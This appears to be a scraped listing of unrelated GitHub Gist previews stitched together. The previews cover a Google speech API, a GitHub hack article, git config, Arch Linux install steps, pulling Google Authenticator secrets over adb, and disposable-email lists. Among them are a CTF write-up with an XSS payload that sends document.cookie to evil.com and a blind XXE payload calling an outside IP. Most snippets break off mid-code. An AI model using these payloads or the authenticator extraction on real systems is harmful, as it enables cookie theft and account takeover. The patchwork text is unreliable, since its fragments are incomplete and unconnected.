Base URL: https://www.google.com/speech-api/v1/recognize
It accepts POST requests with voice file encoded in FLAC format, and query parameters for control.
client
The client's name you're connecting from. For spoofing purposes, let's use chromium
lang
Speech language, for example, ar-QA for Qatari Arabic, or en-US for U.S. English
##How Homakov hacked GitHub and the line of code that could have prevented it
Please note: THIS ARTICLE IS NOT WRITTEN BY THE GITHUB TEAM or in any way associated with them. It's simply hosted as a Gist because the markdown formatting is excellent and far clearer than anything I could manage on my personal Tumblr at peternixey.com.
If you'd like to follow me on twitter my handle is @peternixey
Locate the section for your github remote in the .git/config file. It looks like this:
[remote "origin"]
fetch = +refs/heads/*:refs/remotes/origin/*
url = git@github.com:joyent/node.git
Now add the line fetch = +refs/pull/*/head:refs/remotes/origin/pr/* to this section. Obviously, change the github url to match your project's URL. It ends up looking like this:
| <html lang="en"> | |
| <head> | |
| <script> | |
| function str2hex(str) | |
| { | |
| var out_str = " "; | |
| for(var i = 0; i < str.length; i++) | |
| { |
| # Install ARCH Linux with encrypted file-system and UEFI | |
| # The official installation guide (https://wiki.archlinux.org/index.php/Installation_Guide) contains a more verbose description. | |
| # Download the archiso image from https://www.archlinux.org/ | |
| # Copy to a usb-drive | |
| dd if=archlinux.img of=/dev/sdX bs=16M && sync # on linux | |
| # Boot from the usb. If the usb fails to boot, make sure that secure boot is disabled in the BIOS configuration. | |
| # Set swedish keymap |
| ### Last tested February 7 2014 on a Galaxy S3 (d2att) running Cyanogenmod 11 nightly, with Google Authenticator 2.49. | |
| ### Device with Google Authenticator must have root. | |
| ### Computer requires Android Developer Tools and SQLite 3. | |
| ### Connect your device in USB debugging mode. | |
| $ cd /tmp | |
| $ adb root | |
| $ adb pull /data/data/com.google.android.apps.authenticator2/databases/databases |
| In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack. | |
| We didn't have to figure out exactly how the anomaly detection worked, but as soon as we understood that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's): | |
| anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/> |
| @binkmail.com | |
| @bobmail.info | |
| @chammy.info | |
| @devnullmail.com | |
| @letthemeatspam.com | |
| @mailinater.com | |
| @mailinator.net | |
| @mailinator2.com | |
| @notmailinator.com | |
| @reallymymail.com |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| aa.je | |
| ae.je | |
| ae.gg | |
| ae.ht | |
| af.je | |
| af.cx | |
| af.gg | |
| af.gl | |
| af.ht | |
| ah.je |
